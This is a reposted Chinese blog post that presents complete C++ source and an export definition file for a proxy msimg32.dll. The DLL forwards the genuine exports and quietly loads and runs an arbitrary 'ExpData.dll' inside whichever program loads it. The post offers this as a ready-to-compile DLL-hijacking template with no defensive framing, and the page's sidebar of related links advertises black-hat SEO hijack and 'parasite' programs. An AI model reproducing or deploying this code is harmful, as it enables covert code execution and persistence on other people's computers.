劫持程序、不是难事[附件]

最新推荐文章于 2024-10-04 17:23:17 发布
最新推荐文章于 2024-10-04 17:23:17 发布
阅读量133 收藏
点赞数
原文链接:http://www.cnblogs.com/netxy/archive/2013/02/23/2923853.html
版权

在VC++中新建个一个简单的dll

代码如下:Msimg32ForVC.cpp
#include "stdafx.h"
#include <tchar.h>
 
//bool is_Load;
HMODULE g_hDll;
PVOID g_pOldAlphaBlend;
PVOID g_pOldDllInitialize;
PVOID g_pOldGradientFill;
PVOID g_pOldTransparentBlt;
PVOID g_pOldvSetDdrawflag;
 
 
void ExpLoad()
{
HINSTANCE g_ExpData = LoadLibrary(" ExpData.dll"); //你需要调用的dll文件、文件名自定
if(g_ExpData>0)
{
typedef (*ExpLoad)();
ExpLoad expLoad = (ExpLoad)GetProcAddress(g_ExpData," ExpLoad"); //接口为ExpLoad,也可自定
expLoad();  
}
}
 
 
BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved)
{
 switch (ul_reason_for_call)
 {
 case DLL_PROCESS_ATTACH:
  g_hDll = LoadLibrary(_T("C:\\Windows\\system32\\msimg32.dll"));
  if (g_hDll > 0)
  {
   g_pOldAlphaBlend = GetProcAddress(g_hDll, "AlphaBlend");
   g_pOldDllInitialize = GetProcAddress(g_hDll, "DllInitialize");
   g_pOldGradientFill = GetProcAddress(g_hDll, "GradientFill");
   g_pOldTransparentBlt = GetProcAddress(g_hDll, "TransparentBlt");
   g_pOldvSetDdrawflag = GetProcAddress(g_hDll, "vSetDdrawflag");
   ExpLoad();
  }
  break;
 case DLL_THREAD_ATTACH:
  break;
 case DLL_THREAD_DETACH:
  break;
 case DLL_PROCESS_DETACH:
  break;
 }
 return TRUE;
}
void __declspec(naked) AlphaBlend()
{
 __asm jmp g_pOldAlphaBlend;
}
 
void __declspec(naked) DllInitialize()
{
 __asm jmp g_pOldDllInitialize;
}
 
void __declspec(naked) GradientFill()
{
 __asm jmp g_pOldGradientFill;
}
 
void __declspec(naked) TransparentBlt()
{
 __asm jmp g_pOldTransparentBlt;
}
 
void __declspec(naked) vSetDdrawflag()
{
 __asm jmp g_pOldvSetDdrawflag;
}
 
代码如下:Msimg32ForVC.def
LIBRARY
EXPORTS
 AlphaBlend
 DllInitialize
 GradientFill
 TransparentBlt
 vSetDdrawflag
编译即可

转载于:https://www.cnblogs.com/netxy/archive/2013/02/23/2923853.html

weixin_30675967
关注
VC++实现IE定向劫持跳转
尹成的技术博客
06-08 4664
建立黑名单,防范钓鱼网站#ifdef _DEBUG #define new DEBUG_NEW #undef THIS_FILE static char THIS_FILE[] = __FILE__; #endif ///////////////////////////////////////////////////////////////////////////// // CAb
2021-02-26
m0_47891641的博客
02-26 2512
计算的极限(续) 计算的极限 计算的极限(零) 计算的极限(一):所有机器的机器,与无法计算的问题 计算的极限(二):自我指涉与不可判定 计算的极限(三):函数构成的世界 计算的极限(四):机械计算的圭臬 计算的极限(五):有限的障壁 计算的极限(六):无穷的彼岸 计算的极限(七):宛如神谕 计算的极限(八):符号的框架 计算的极限(九):叹息与奋斗 计算的极限(十):无限绵延的层级 计算的极限(十一):黄金时代 计算的极限(十二):不会出错的程序 计算的极限(十三):数字空间
linux fpv源代码,msimg32源代码一份(宏利用)
weixin_39847437的博客
05-12 366
代码摘录于网络,这组宏用得非常巧妙,感谢原作者~~~#includeHMODULEg_hMSIMG32=NULL;#defineMSIMG32_DEF_IMPORT(x,y)g_fp##x=GetProcAddress(g_hMSIMG32,y);#defineMSIMG32_BUILD_STUB(x)__declspec(naked)voidx(void){...
我对Windows桌面任务栏自动隐藏功能的一点小小改进--不再自动弹出(2013-02-26更新)...
weixin_34228617的博客
01-09 772
tfref  由于是笔记本电脑, 由于屏幕太小, 也可能是不想让别人看见自己打开了哪些窗口, 所以选择了把桌面的任务栏的自动隐藏选项给钩上了, 现在只要任务栏失去焦点, 它就会自己隐藏了. 但很不爽的是, 任务栏在屏幕的最下面(其它位置也一样), 只要鼠标稍微碰到就会显示出任务栏, 太不爽了, 所以打算进行一点小的修改, 于是就有了下面的一小段代码...  当然, 采用了最简单的办法, DLL注入...
TransparentBlt+AlphaBlend圆角半透明显示BMP
10-22
TransparentBlt+AlphaBlend透明、半透明、圆角半透明显示BMP图片
第12章 安全通信与网络攻击
HeLLo_a119的博客
11-30 1733
安全通信与网络攻击
杀毒软件可能令企业用户陷入更大危机
weixin_34090562的博客
07-06 220
安全研究人员担心,杀毒产品中的关键性安全漏洞往往极易被发现及利用。 想象一下,如果贵公司的IT部门来电称我们的工作站受到了入侵,我们必须立即停止正常业务运作,这时大家肯定相当愤怒:我们已经顺利通过了企业设置的安全培训,也确定自己从来没有打开过任何可疑的电子邮件附件或者点击任何恶意链接; 另外,我们也清楚自己的企业拥有强大的修复策略并始终保持计算机上的软件...
勒索病毒急救指南
m0_74402888的博客
10-04 1075
为 js 、vbs、wsf、bat、cmd、ps1 等脚本文件和 exe、scr、com 等可执行程序,对于。NSAtools 只是一个针对“WANNACRY 勒索病毒的防护工具”,并非是针对所有勒索病毒的。360 安全卫士的系统安全防护功能,能针对远程桌面弱口令,mysql 弱口令,mssql 弱。勒索病毒的传播渠道很多,安装了 NSAtools 只是关闭了一条勒索病毒的传播渠。安装 360 安全卫士并开启反勒索服务,一旦电脑被勒索软件感染,可以通过 360 反勒索。已支持解密的勒索病毒家族,通过解。
图解HTTP读书笔记
thezapple的博客
10-30 5631
图解HTTP前言第一章 Web及网络基础1.1 使用HTTP协议访问Web1.2 HTTP的诞生 前言 用到HTTP协议的各方面知识:网络爬虫程序、分析抓包数据、实现HTTP服务器、提供网站REST API、修改后端定制框架等方面。本书前半部分由HTTP的成长发展史娓娓道来,基于HTTP 1.1标准讲解通信过程,包括HTTP方法、协议格式、报文结构、首部字段、状态码等的具体含义,还分别讲解HTTP通信过程中代理、网关、隧道等的作用。接着介绍SPDY、WebSocket、WebDAV等HTTP的扩展功能。作者
PHP寄生虫繁殖劫持程序V3.0
08-03
动态意味着该程序能够在运行时根据需要生成和修改页面,而不是仅仅依赖预定义的静态文件。这使得它们更具隐蔽性和适应性,能更好地逃避检测和清理。动态寄生虫通常利用PHP的动态脚本执行能力,结合服务器环境中的...
黑帽seo劫持程序,js劫持搜索引擎代码
10-23
【黑帽SEO劫持程序与JS搜索引擎劫持代码解析】 在互联网营销领域,搜索引擎优化(SEO)是提升网站排名和可见度的关键策略。然而,一些不道德的从业者采取了所谓的“黑帽SEO”手法,试图通过非法手段快速提高网站...
DLL劫持示例程序:EXE+DLL
07-03
DLL劫持是指攻击者在程序试图加载特定DLL时,将恶意的DLL放置在应用程序搜索路径的优先级较高位置,导致程序加载错误的DLL,而非预期的合法DLL。这种攻击方式通常用于绕过权限限制、执行恶意代码或窃取敏感信息。 2...
28项全能版动态寄生虫程序-烟雨开发动态寄生虫安装控制面板-2022动态寄生虫程序-全网独家
07-14
28项全能版动态寄生虫程序-烟雨开发动态寄生虫安装控制面板-2022动态寄生虫程序-全网独家【此资源仅含动态寄生虫程序视频介绍不含程序】【此资源仅含动态寄生虫程序视频介绍不含程序】【此资源仅含动态寄生虫程序...
烟雨黑帽SEO动态寄生虫程序全站更新快照程序2022版-特别适合配合动态寄生虫使用。
07-07
【此资源只包含动态寄生虫快照劫持程序视频演示,不含程序】【此资源只包含动态寄生虫快照劫持程序视频演示,不含程序】【此资源只包含动态寄生虫快照劫持程序视频演示,不含程序】烟雨黑帽SEO全站更改快照程序-首页...
DNS劫持(网页打不开的解决方法)
热门推荐
追尋ゝ
03-15 1万+
我们上网,必不可少的就是DNS,在这里先介绍下DNS的相关知识。 DNS 是域名系统 (Domain NameSystem) 的缩写,它是由解析器和域名服务器组成的。域名服务器是指保存有该网络中所有主机的域名和对应IP地址,并具有将域名转换为IP地址功能的服务器。其中域名必须对应一个IP地址,而IP地址不一定有域名。   其实,我们平时访问网站,例如我们访问百度,那么我们在浏览器里面输入ww
基于java的贝儿米幼儿教育管理系统答辩PPT.pptx
11-04
基于java的贝儿米幼儿教育管理系统答辩PPT.pptx
课设毕设基于SpringBoot+Vue的养老院管理系统的设计与实现源码可运行.zip
最新发布
11-04
本压缩包资源说明,你现在往下拉可以看到压缩包内容目录 我是批量上传的基于SpringBoot+Vue的项目,所以描述都一样;有源码有数据库脚本,系统都是测试过可运行的,看文件名即可区分项目~ |Java|SpringBoot|Vue|前后端分离| 开发语言:Java 框架:SpringBoot,Vue JDK版本:JDK1.8 数据库:MySQL 5.7+(推荐5.7,8.0也可以) 数据库工具:Navicat 开发软件: idea/eclipse(推荐idea) Maven包:Maven3.3.9+ 系统环境:Windows/Mac
基于java的消防物资存储系统答辩PPT.pptx
11-04
基于java的消防物资存储系统答辩PPT.pptx
php寄生虫繁殖劫持程序v3.0
06-24
一旦攻击成功,程序会对网站进行恶意劫持,使得网站出现异常。这种恶意软件可以在网站背后悄悄地进行远程操作,从而进行各种非法活动,如监视网站的管理员、盗取网站信息、篡改网站内容等等。 php寄生虫繁殖劫持...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值